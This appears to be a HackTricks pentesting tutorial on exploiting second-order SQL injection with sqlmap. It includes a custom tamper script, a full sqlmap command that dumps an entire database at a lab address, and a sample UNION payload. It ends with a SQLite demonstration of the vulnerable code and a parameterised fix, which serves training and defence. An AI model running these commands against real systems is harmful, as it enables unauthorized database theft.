tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SQLMap can exploit second-order SQL injections.
You need to provide:
- the request where the SQL injection payload will be stored
- the request where the payload will be executed
The request where the SQL injection payload is stored is indicated just like for any other injection in sqlmap. The request where sqlmap can read the output/execution of the injection can be indicated with --second-url, or with --second-req if you need to indicate a complete request from a file.
Simple second-order example:

```bash
# Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

# Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt
```
In several cases this won't be enough, because you will need to perform other actions apart from sending the payload and accessing a different page.
When this is needed you can use a sqlmap tamper. For example, the following script will register a new user using the sqlmap payload as the email and then log out.
```python
#!/usr/bin/env python
import re
import requests
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def login_account(payload):
    # Route the extra requests through the local proxy so they can be inspected
    proxies = {'http': 'http://127.0.0.1:8080'}
    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
    # Register a new account using the sqlmap payload as the email field
    params = {"username": "asdasdasd", "email": payload, "password": "11111111"}
    url = "http://10.10.10.10/create.php"
    requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
    # Log out so the request sqlmap sends next (login.txt) starts from a clean session
    url = "http://10.10.10.10/exit.php"
    requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)


def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})  # unused here, kept for the standard tamper signature
    login_account(payload)
    # The payload is returned unchanged: this tamper only performs the side requests
    return payload
```
A sqlmap tamper is always executed before an injection attempt with a payload starts, and it must return the payload. In this case we don't care about the payload itself but about sending the extra requests, so the payload is returned unchanged.
So, if for some reason we need a more complex flow to exploit the second-order SQL injection, such as:
- Create an account with the SQLi payload inside the "email" field
- Log out
- Log in with that account (login.txt)
- Send a request to execute the SQL injection (second.txt)
This sqlmap line will help:
```bash
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a

##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLi payload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on the email parameter (you can also do this with an "email=*" inside login.txt)
# --second-req second.txt : Request to send to execute the SQLi and get the output
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap by indicating the technique to use
# --dbms mysql : Help sqlmap by indicating the DBMS
# --prefix "a2344r3F'" : Help sqlmap detect the injection by indicating the prefix
# --union-char "DTEC" : Help sqlmap by indicating a different union-char so it can identify the vuln
# -a : Dump all
```
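To make the create.php / details.php flow above concrete from the defender's side, here is an added example (not from the original page or from sqlmap) with a constructed in-memory SQLite schema: the registration INSERT is parameterised, so the payload stored in "email" does nothing at that point, while the later profile lookup splices the stored value into SQL and becomes the second-order sink. The hardened lookup binds the stored value as a parameter; the table, column and payload values are all constructed for the demo.

```python
import sqlite3

# Constructed sample payload of the kind sqlmap would store in the "email" field:
# it closes the string literal, appends a UNION, and comments out the rest of the query.
PAYLOAD_EMAIL = "x' UNION SELECT username, password FROM users -- "


def setup_db():
    """Constructed in-memory schema standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin@example.test', 's3cret')")
    conn.commit()
    return conn


def create_account(conn, username, email, password):
    """create.php equivalent: parameterised INSERT, so the payload is stored verbatim and nothing fires."""
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (username, email, password))
    conn.commit()


def details_vulnerable(conn, username):
    """details.php equivalent, second-order sink: trusts the stored email and concatenates it into SQL."""
    (email,) = conn.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()
    return conn.execute("SELECT username, email FROM users WHERE email = '%s'" % email).fetchall()


def details_fixed(conn, username):
    """Same lookup, hardened: data read back from the database is bound, never spliced into query text."""
    (email,) = conn.execute("SELECT email FROM users WHERE username = ?", (username,)).fetchone()
    return conn.execute("SELECT username, email FROM users WHERE email = ?", (email,)).fetchall()


def demo():
    """Run the two-step flow once and return (vulnerable result, hardened result)."""
    conn = setup_db()
    create_account(conn, "asdasdasd", PAYLOAD_EMAIL, "11111111")
    return details_vulnerable(conn, "asdasdasd"), details_fixed(conn, "asdasdasd")
```

The vulnerable lookup returns every username/password pair, which is exactly what the second request in the sqlmap flow reads; the hardened lookup returns only the attacker's own row with the payload as a literal string.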